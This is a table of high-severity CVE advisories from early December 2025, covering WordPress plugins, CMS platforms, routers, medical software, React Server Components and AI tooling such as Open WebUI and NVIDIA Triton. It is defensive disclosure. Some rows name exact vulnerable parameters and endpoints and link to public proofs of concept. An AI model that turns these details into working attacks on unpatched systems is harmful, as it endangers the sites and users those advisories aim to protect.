| DesignThemes--DesignThemes LMS | The DesignThemes LMS plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.4. This is due to the 'dtlms_register_user_front_end' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. | 2025-12-02 | 9.8 | CVE-2025-13542 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c880470f-3f81-47a2-b450-7074410e9f43?source=cve https://themeforest.net/item/egrad-education-wordpress-theme/42803015 |
| dripadmin--CRM Memberships | The CRM Memberships plugin for WordPress is vulnerable to privilege escalation via password reset in all versions up to, and including, 2.5. This is due to missing authorization and authentication checks on the `ntzcrm_changepassword` AJAX action. This makes it possible for unauthenticated attackers to reset arbitrary user passwords and gain unauthorized access to user accounts via the `ntzcrm_changepassword` endpoint, granted they can obtain or enumerate a target user's email address. The plugin also exposes the `ntzcrm_get_users` endpoint without authentication, allowing attackers to enumerate subscriber email addresses, facilitating the exploitation of the password reset vulnerability. | 2025-12-05 | 9.8 | CVE-2025-13313 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e2837399-c44f-494e-bdc6-f9c6e4e2dc11?source=cve https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/ntzcrm-memberships.php#L42 https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-api.php#L12 https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-api.php#L63 https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-api.php#L795 https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-dbquery.php#L287 |
| e4jvikwp--VikRentCar Car Rental Management System | The VikRentCar Car Rental Management System plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'month' parameter in all versions up to, and including, 1.4.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-02 | 7.5 | CVE-2025-13724 | https://www.wordfence.com/threat-intel/vulnerabilities/id/724a2da0-e4e7-4868-a1ad-fce69a915981?source=cve https://plugins.trac.wordpress.org/browser/vikrentcar/trunk/admin/views/overv/view.html.php#L195 https://plugins.trac.wordpress.org/browser/vikrentcar/tags/1.4.4/admin/views/overv/view.html.php#L195 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3403439%40vikrentcar&new=3403439%40vikrentcar&sfp_email=&sfph_mail= |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to 15.86.0 and 14.99.2, a certain endpoint was vulnerable to error-based SQL injection due to lack of validation of parameters. Some information like version could be retrieved. This vulnerability is fixed in 15.86.0 and 14.99.2. | 2025-12-01 | 7.1 | CVE-2025-66205 | https://github.com/frappe/frappe/security/advisories/GHSA-mp93-8vxr-hqq9 https://github.com/frappe/frappe/commit/984c641bff9539b6126a01146096f133db6a955b |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, when a user with privilege of user creation creates a new user through the Admin UI and supplies a username containing path traversal sequences (for example ..\Nijat or ../Nijat), Grav writes the account YAML file to an unintended path outside user/accounts/. The written YAML can contain account fields such as email, fullname, twofa_secret, and hashed_password. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 8.8 | CVE-2025-66295 | https://github.com/getgrav/grav/security/advisories/GHSA-h756-wh59-hhjv https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a privilege escalation vulnerability exists in Grav's Admin plugin due to the absence of username uniqueness validation when creating users. A user with the create user permission can create a new account using the same username as an existing administrator account, set a new password/email, and then log in as that administrator. This effectively allows privilege escalation from limited user-manager permissions to full administrator access. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 8.8 | CVE-2025-66296 | https://github.com/getgrav/grav/security/advisories/GHSA-cjcp-qxvg-4rjm https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, Grav CMS is vulnerable to a Server-Side Template Injection (SSTI) that allows any authenticated user with editor permissions to execute arbitrary code on the remote server, bypassing the existing security sandbox. Since the security sandbox does not fully protect the Twig object, it is possible to interact with it (e.g., call methods, read/write attributes) through maliciously crafted Twig template directives injected into a web page. This allows an authenticated editor to add arbitrary functions to the Twig attribute system.twig.safe_filters, effectively bypassing the Grav CMS sandbox. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 8.8 | CVE-2025-66299 | https://github.com/getgrav/grav/security/advisories/GHSA-gjc5-8cfh-653x https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, A low privilege user account with page editing privilege can read any server files using "Frontmatter" form. This includes Grav user account files (/grav/user/accounts/*.yaml), which store hashed user password, 2FA secret, and the password reset token. This can allow an adversary to compromise any registered account by resetting a password for a user to get access to the password reset token from the file or by cracking the hashed password. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 8.5 | CVE-2025-66300 | https://github.com/getgrav/grav/security/advisories/GHSA-p4ww-mcp9-j6f2 https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.4 prior to 18.4.5, 18.5 prior to 18.5.3, and 18.6 prior to 18.6.1 that could have allowed an authenticated user to obtain credentials from higher-privileged users and perform actions in their context under specific conditions. | 2025-12-05 | 7.7 | CVE-2024-9183 | GitLab Issue #494478 HackerOne Bug Bounty Report #2707421 |
| H3C--Magic B0 | A weakness has been identified in H3C Magic B0 up to 100R002. This impacts the function EditWlanMacList of the file /goform/aspForm. This manipulation of the argument param causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 8.8 | CVE-2025-14015 | VDB-334256 | H3C Magic B0 aspForm EditWlanMacList buffer overflow VDB-334256 | CTI Indicators (IOB, IOC, IOA) Submit #694755 | New H3C Technologies Co., Ltd. Magic Bo Magic B0<=100R002 Buffer Overflow https://github.com/HungryGoogle/log_attack/blob/main/index2/2.md |
| H3C--Magic B1 | A weakness has been identified in H3C Magic B1 up to 100R004. The affected element is the function sub_44de0 of the file /goform/aspForm. This manipulation of the argument param causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 8.8 | CVE-2025-14196 | VDB-334616 | H3C Magic B1 aspForm sub_44de0 buffer overflow VDB-334616 | CTI Indicators (IOB, IOC, IOA) Submit #699387 | H3C Magic B1 ≤100R004 Buffer Overflow https://github.com/lin-3-start/lin-cve/blob/main/H3C%20Magic%20B1/H3C%20Magic%20B1.md https://github.com/lin-3-start/lin-cve/blob/main/H3C%20Magic%20B1/H3C%20Magic%20B1.md#poc |
| hwk-fr--Advanced Custom Fields: Extended | The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to Remote Code Execution in versions 0.9.0.5 through 0.9.1.1 via the prepare_form() function. This is due to the function accepting user input and then passing that through call_user_func_array(). This makes it possible for unauthenticated attackers to execute arbitrary code on the server, which can be leveraged to inject backdoors or create new administrative user accounts. | 2025-12-03 | 9.8 | CVE-2025-13486 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c508cb73-53e6-4ebe-b3d0-285908b722c9?source=cve https://plugins.trac.wordpress.org/changeset/3400134/acf-extended |
| IBM--Informix Dynamic Server | IBM Informix Dynamic Server 14.10 could allow a local user on the system to log into the Informix server as administrator without a password. | 2025-12-02 | 8.4 | CVE-2024-45675 | https://www.ibm.com/support/pages/node/7252704 |
| kapilduraphe--mcp-watch | MCP Watch is a comprehensive security scanner for Model Context Protocol (MCP) servers. In 0.1.2 and earlier, the MCPScanner class contains a critical Command Injection vulnerability in the cloneRepo method. The application passes the user-supplied githubUrl argument directly to a system shell via execSync without sanitization. This allows an attacker to execute arbitrary commands on the host machine by appending shell metacharacters to the URL. | 2025-12-01 | 9.8 | CVE-2025-66401 | https://github.com/kapilduraphe/mcp-watch/security/advisories/GHSA-27m7-ffhq-jqrm https://github.com/kapilduraphe/mcp-watch/commit/e7da78c5b4b960f8b66c254059ad9ebc544a91a6 |
| kraftplugins--Demo Importer Plus | The Demo Importer Plus plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 2.0.6. This is due to insufficient file type validation detecting WXR files, allowing double extension files to bypass sanitization while being accepted as a valid WXR file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-05 | 8.8 | CVE-2025-13066 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7df0ea8a-5e2c-4f5e-a326-b92df37ffa3c?source=cve https://plugins.trac.wordpress.org/changeset/3400301/demo-importer-plus/trunk/inc/importers |
| Linksys--RE6500 | A vulnerability was found in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. Affected by this vulnerability is the function AP_get_wireless_clientlist_setClientsName of the file mod_form.so. Performing manipulation of the argument clientsname_0 results in stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 8.8 | CVE-2025-14133 | VDB-334522 | Linksys RE6500/RE6250/RE6300/RE6350/RE7000/RE9000 mod_form.so AP_get_wireless_clientlist_setClientsName stack-based overflow VDB-334522 | CTI Indicators (IOB, IOC, IOA) Submit #697980 | Linksys RE6500ã€RE6250ã€RE6300ã€RE6350ã€RE7000ã€RE9000 RE6500(1.0.013.001) RE6250(1.0.04.001) RE6300(1.2.07.001) RE6350(1.0.04.001) RE7000(1.1.05.003) RE9000(1.0.04.002) Stack-based Buffer Overflow https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_62/62.md https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_62/62.md#poc https://www.linksys.com/ |
| Linksys--RE6500 | A vulnerability was determined in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. Affected by this issue is the function RE2000v2Repeater_get_wireless_clientlist_setClientsName of the file mod_form.so. Executing manipulation of the argument clientsname_0 can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 8.8 | CVE-2025-14134 | VDB-334523 | Linksys RE6500/RE6250/RE6300/RE6350/RE7000/RE9000 mod_form.so stack-based overflow VDB-334523 | CTI Indicators (IOB, IOC, IOA) Submit #697981 | Linksys RE6500ã€RE6250ã€RE6300ã€RE6350ã€RE7000ã€RE9000 RE6500(1.0.013.001) RE6250(1.0.04.001) RE6300(1.2.07.001) RE6350(1.0.04.001) RE7000(1.1.05.003) RE9000(1.0.04.002) Stack-based Buffer Overflow https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_63/63.md https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_63/63.md#poc https://www.linksys.com/ |
| Linksys--RE6500 | A vulnerability was identified in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. This affects the function AP_get_wired_clientlist_setClientsName of the file mod_form.so. The manipulation of the argument clientsname_0 leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 8.8 | CVE-2025-14135 | VDB-334524 | Linksys RE6500/RE6250/RE6300/RE6350/RE7000/RE9000 mod_form.so AP_get_wired_clientlist_setClientsName stack-based overflow VDB-334524 | CTI Indicators (IOB, IOC, IOA) Submit #697982 | Linksys RE6500ã€RE6250ã€RE6300ã€RE6350ã€RE7000ã€RE9000 RE6500(1.0.013.001) RE6250(1.0.04.001) RE6300(1.2.07.001) RE6350(1.0.04.001) RE7000(1.1.05.003) RE9000(1.0.04.002) Stack-based Buffer Overflow https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_64/64.md https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_64/64.md#poc https://www.linksys.com/ |
| Linksys--RE6500 | A security flaw has been discovered in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. This vulnerability affects the function RE2000v2Repeater_get_wired_clientlist_setClientsName of the file mod_form.so. The manipulation of the argument clientsname_0 results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 8.8 | CVE-2025-14136 | VDB-334525 | Linksys RE6500/RE6250/RE6300/RE6350/RE7000/RE9000 mod_form.so stack-based overflow VDB-334525 | CTI Indicators (IOB, IOC, IOA) Submit #697983 | Linksys RE6500ã€RE6250ã€RE6300ã€RE6350ã€RE7000ã€RE9000 RE6500(1.0.013.001) RE6250(1.0.04.001) RE6300(1.2.07.001) RE6350(1.0.04.001) RE7000(1.1.05.003) RE9000(1.0.04.002) Stack-based Buffer Overflow https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_65/65.md https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_65/65.md#poc https://www.linksys.com/ |
| listingthemes--WP Directory Kit | The WP Directory Kit plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.4.4 due to incorrect implementation of the authentication algorithm in the "wdk_generate_auto_login_link" function. This is due to the feature using a cryptographically weak token generation mechanism. This makes it possible for unauthenticated attackers to gain administrative access and achieve full site takeover via the auto-login endpoint with a predictable token. | 2025-12-03 | 10 | CVE-2025-13390 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6598d171-e68c-4d2f-9cd1-f1574fa90433?source=cve https://plugins.trac.wordpress.org/changeset/3400599/wpdirectorykit/ https://github.com/d0n601/CVE-2025-13390 https://ryankozak.com/posts/cve-2025-13390/ |
| MasaCMS--MasaCMS | Masa CMS is an open source Enterprise Content Management platform. Masa CMS versions prior to 7.2.8, 7.3.13, and 7.4.6 are vulnerable to remote code execution. The vulnerability exists in the addParam function, which accepts user input via the criteria parameter. This input is subsequently evaluated by setDynamicContent, allowing an unauthenticated attacker to execute arbitrary code via the m tag. The vulnerability is patched in versions 7.2.8, 7.3.13, and 7.4.6. | 2025-12-03 | 9.8 | CVE-2024-32641 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-cj9g-v5mq-qrjm https://github.com/MasaCMS/MasaCMS/commit/fb27f822fe426496af71205fa35208e58823fcf6 |
| MasaCMS--MasaCMS | Masa CMS is an open source Enterprise Content Management platform. Prior to 7.2.8, 7.3.13, and 7.4.6, there is vulnerable to host header poisoning which allows account takeover via password reset email. This vulnerability is fixed in 7.2.8, 7.3.13, and 7.4.6. | 2025-12-03 | 8.8 | CVE-2024-32642 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-qjm6-c8hx-ffh8 https://github.com/MasaCMS/MasaCMS/commit/7541b9c99fb9e32d1de6f2658750525cec1d8960 |
| MasaCMS--MasaCMS | Masa CMS is an open source Enterprise Content Management platform. Prior to 7.2.8, 7.3.13, and 7.4.6, if the URL to the page is modified to include a /tag/ declaration, the CMS will render the page regardless of group restrictions. This vulnerability is fixed in 7.2.8, 7.3.13, and 7.4.6. | 2025-12-03 | 7.5 | CVE-2024-32643 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-f469-jh82-97fv https://github.com/MasaCMS/MasaCMS/commit/d1a2e57ef8dbc50c87b178eacc85fcccb05f5b6c |
| MAXHUB--Pivot client application | The password reset mechanism for the Pivot client application is weak, and it may allow an attacker to take over the account. | 2025-12-04 | 7.5 | CVE-2025-53704 | https://www.maxhub.com/en/support/ https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-02 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-338-02.json |
| Medtronic--CareLink Network | Medtronic CareLink Network allows an unauthenticated remote attacker to perform a brute force attack on an API endpoint that could be used to determine a valid password under certain circumstances. This issue affects CareLink Network: before December 4, 2025. | 2025-12-04 | 8.1 | CVE-2025-12995 | https://www.medtronic.com/en-us/e/product-security/security-bulletins/carelink-network-vulnerabilities.html |
| Meta--react-server-dom-webpack | A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints. | 2025-12-03 | 10 | CVE-2025-55182 | https://www.facebook.com/security/advisories/cve-2025-55182 https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components |
| Mirion Medical--EC2 Software NMIS BioDose | NMIS/BioDose V22.02 and previous versions rely on a common SQL Server user account to access data in the database. User access in the client application is restricted by a password authentication check in the client software but the underlying database connection always has access. The latest version of NMIS/BioDose introduces an option to use Windows user authentication with the database, which would restrict this database connection. | 2025-12-02 | 8.3 | CVE-2025-61940 | https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-336-01 |
| Mirion Medical--EC2 Software NMIS BioDose | NMIS/BioDose V22.02 and previous versions rely on a Microsoft SQL Server database. The SQL user account 'nmdbuser' and other created accounts by default have the sysadmin role. This can lead to remote code execution through the use of certain built-in stored procedures. | 2025-12-02 | 8.3 | CVE-2025-62575 | https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-336-01 |
| Mirion Medical--EC2 Software NMIS BioDose | NMIS/BioDose V22.02 and previous version installations where the embedded Microsoft SQLServer Express is used are exposed in the Windows share accessed by clients in networked installs. By default, this directory has insecure directory paths that allow access to the SQL Server database and configuration files, which can contain sensitive data. | 2025-12-02 | 8.4 | CVE-2025-64298 | https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-336-01 |
| Mirion Medical--EC2 Software NMIS BioDose | NMIS/BioDose V22.02 and previous versions' installation directory paths by default have insecure file permissions, which in certain deployment scenarios can enable users on client workstations to modify the program executables and libraries. | 2025-12-02 | 8 | CVE-2025-64642 | https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-336-01 |
| Mirion Medical--EC2 Software NMIS BioDose | NMIS/BioDose software V22.02 and previous versions contain executable binaries with plain text hard-coded passwords. These hard-coded passwords could allow unauthorized access to both the application and database. | 2025-12-02 | 7.3 | CVE-2025-64778 | https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-336-01 |
| moderntribe--Auto Thumbnailer | The Auto Thumbnailer plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the uploadThumb() function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-05 | 8.8 | CVE-2025-12154 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d7c98191-bf17-4e94-88cc-ad385b1fe97d?source=cve https://wordpress.org/plugins/auto-thumbnailer/ |
| moxi159753--Mogu Blog v2 | A security flaw has been discovered in moxi159753 Mogu Blog v2 up to 5.2. Impacted is the function LocalFileServiceImpl.uploadPictureByUrl of the file /file/uploadPicsByUrl. The manipulation results in server-side request forgery. The attack can be launched remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 7.3 | CVE-2025-13814 | VDB-333823 | moxi159753 Mogu Blog v2 uploadPicsByUrl LocalFileServiceImpl.uploadPictureByUrl server-side request forgery VDB-333823 | CTI Indicators (IOB, IOC, IOA) Submit #692105 | moxi159753 mogu_blog_v2 <=v5.2 Server-Side Request Forgery (SSRF) https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-ssrf-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-ssrf-1/report.md#proof-of-concept |
| n/a--ABRT daemon | A flaw was found in the ABRT daemon's handling of user-supplied mount information.ABRT copies up to 12 characters from an untrusted input and places them directly into a shell command (docker inspect %s) without proper validation. An unprivileged local user can craft a payload that injects shell metacharacters, causing the root-running ABRT process to execute attacker-controlled commands and ultimately gain full root privileges. | 2025-12-03 | 8.8 | CVE-2025-12744 | https://access.redhat.com/security/cve/CVE-2025-12744 RHBZ#2412467 |
| n/a--Blood Bank Management System | A cross-site scripting (XSS) vulnerability exists in the Blood Bank Management System within the abs.php component. The application fails to properly sanitize or encode user-supplied input before rendering it in response. An attacker can inject malicious JavaScript payloads into the msg parameter, which is then executed in the victim's browser when the page is viewed. | 2025-12-01 | 8.5 | CVE-2025-63526 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63526.md |
| n/a--Blood Bank Management System 1.0 | A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the receiverLogin.php component. The application fails to properly sanitize user-supplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the remail and rpassword fields, an attacker can bypass authentication and gain unauthorized access to the system. | 2025-12-01 | 10 | CVE-2025-63531 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63531.md |
| n/a--Blood Bank Management System 1.0 | An issue was discovered in Blood Bank Management System 1.0 allowing authenticated attackers to perform actions with escalated privileges via crafted request to delete.php. | 2025-12-01 | 9.6 | CVE-2025-63525 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63525.md |
| n/a--Blood Bank Management System 1.0 | A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the cancel.php component. The application fails to properly sanitize user-supplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the search field, an attacker can bypass authentication and gain unauthorized access to the system. | 2025-12-01 | 9.6 | CVE-2025-63532 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63532.md |
| n/a--Blood Bank Management System 1.0 | A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the abs.php component. The application fails to properly sanitize usersupplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the search field, an attacker can bypass authentication and gain unauthorized access to the system. | 2025-12-01 | 9.6 | CVE-2025-63535 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63535.md |
| n/a--Blood Bank Management System 1.0 | A cross-site scripting (XSS) vulnerability exists in the Blood Bank Management System 1.0 within the updateprofile.php and hprofile.php components. The application fails to properly sanitize or encode user-supplied input before rendering it in response. An attacker can inject malicious JavaScript payloads into the hname, hemail, hpassword, hphone, hcity parameters, which are then executed in the victim's browser when the page is viewed. | 2025-12-01 | 8.5 | CVE-2025-63527 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63527.md |
| n/a--Blood Bank Management System 1.0 | A cross-site scripting (XSS) vulnerability exists in the Blood Bank Management System 1.0 within the blooddinfo.php component. The application fails to properly sanitize or encode user-supplied input before rendering it in response. An attacker can inject malicious JavaScript payloads into the error parameter, which is then executed in the victim's browser when the page is viewed. | 2025-12-01 | 8.5 | CVE-2025-63528 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63528.md |
| n/a--Blood Bank Management System 1.0 | A cross-site scripting (XSS) vulnerability exists in the Blood Bank Management System 1.0 within the updateprofile.php and rprofile.php components. The application fails to properly sanitize or encode user-supplied input before rendering it in response. An attacker can inject malicious JavaScript payloads into the rname, remail, rpassword, rphone, rcity parameters, which are then executed in the victim's browser when the page is viewed. | 2025-12-01 | 8.5 | CVE-2025-63533 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63533.md |
| n/a--Blood Bank Management System 1.0 | A cross-site scripting (XSS) vulnerability exists in the Blood Bank Management System 1.0 within the login.php component. The application fails to properly sanitize or encode user-supplied input before rendering it in response. An attacker can inject malicious JavaScript payloads into the msg and error parameters, which are then executed in the victim's browser when the page is viewed. | 2025-12-01 | 8.5 | CVE-2025-63534 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63534.md |
| n/a--MediaCrush | A vulnerability was identified in MediaCrush 1.0.0/1.0.1. The affected element is an unknown function of the file /mediacrush/paths.py of the component Header Handler. Such manipulation of the argument Host leads to improper neutralization of http headers for scripting syntax. The attack can be launched remotely. | 2025-12-01 | 7.3 | CVE-2025-13803 | VDB-333813 | MediaCrush Header paths.py http headers for scripting syntax VDB-333813 | CTI Indicators (IOB, IOC, IOA) Submit #691857 | MediaCrush 1.0 Improper Neutralization of HTTP Headers for Scripting Syntax https://github.com/lakshayyverma/CVE-Discovery/blob/main/mediacrush.md |
| n/a--PgBouncer | Untrusted search path in auth_query connection handler in PgBouncer before 1.25.1 allows an unauthenticated attacker to execute arbitrary SQL during authentication via a malicious search_path parameter in the StartupMessage. | 2025-12-03 | 7.5 | CVE-2025-12819 | https://www.pgbouncer.org/changelog.html#pgbouncer-125x |
| NI--LabVIEW | There is a relative path traversal vulnerability in the NI System Web Server that may result in information disclosure. Successful exploitation requires an attacker to send a specially crafted request to the NI System Web Server, allowing the attacker to read arbitrary files. This vulnerability existed in the NI System Web Server 2012 and prior versions. It was fixed in 2013. | 2025-12-04 | 7.5 | CVE-2025-12097 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/relative-path-traversal-vulnerability-in-ni-system-web-server.html |
| nutzam--NutzBoot | A security vulnerability has been detected in nutzam NutzBoot up to 2.6.0-SNAPSHOT. This impacts an unknown function of the file nutzboot-demo/nutzboot-demo-simple/nutzboot-demo-simple-web3j/src/main/java/io/nutz/demo/simple/module/EthModule.java of the component Transaction API. The manipulation of the argument from/to/wei leads to improper authorization. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. | 2025-12-01 | 7.3 | CVE-2025-13806 | VDB-333816 | nutzam NutzBoot Transaction API EthModule.java improper authorization VDB-333816 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692061 | NutzBoot project (Nutz community) NutzBoot (Web3j starter + demo module) NutzBoot 2.6.0-SNAPSHOT Improper Access Control (Unauthenticated transaction API) https://github.com/Xzzz111/exps/blob/main/archives/nutzboot-UnauthorizedTransfer-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/nutzboot-UnauthorizedTransfer-1/report.md#vulnerability-details-and-poc |
| NVIDIA--TAO | NVIDIA TAO contains a vulnerability where an attacker may cause a resource to be loaded via an uncontrolled search path. A successful exploit of this vulnerability may lead to escalation of privileges, data tampering, denial of service, information disclosure. | 2025-12-03 | 8.8 | CVE-2025-33208 | https://nvd.nist.gov/vuln/detail/CVE-2025-33208 https://www.cve.org/CVERecord?id=CVE-2025-33208 https://nvidia.custhelp.com/app/answers/detail/a_id/5730 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker may cause an improper check for unusual or exceptional conditions issue by sending extra large payloads. A successful exploit of this vulnerability may lead to denial of service. | 2025-12-03 | 7.5 | CVE-2025-33201 | https://nvd.nist.gov/vuln/detail/CVE-2025-33201 https://www.cve.org/CVERecord?id=CVE-2025-33201 https://nvidia.custhelp.com/app/answers/detail/a_id/5734 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Server for Linux contains a vulnerability where an attacker may cause an improper validation of specified quantity in input. A successful exploit of this vulnerability may lead to denial of service. | 2025-12-03 | 7.5 | CVE-2025-33211 | https://nvd.nist.gov/vuln/detail/CVE-2025-33211 https://www.cve.org/CVERecord?id=CVE-2025-33211 https://nvidia.custhelp.com/app/answers/detail/a_id/5734 |
| open-webui--open-webui | Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.37, a Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required. This vulnerability is fixed in 0.6.37. | 2025-12-04 | 8.5 | CVE-2025-65958 | https://github.com/open-webui/open-webui/security/advisories/GHSA-c6xv-rcvw-v685 https://github.com/open-webui/open-webui/commit/02238d3113e966c353fce18f1b65117380896774 |
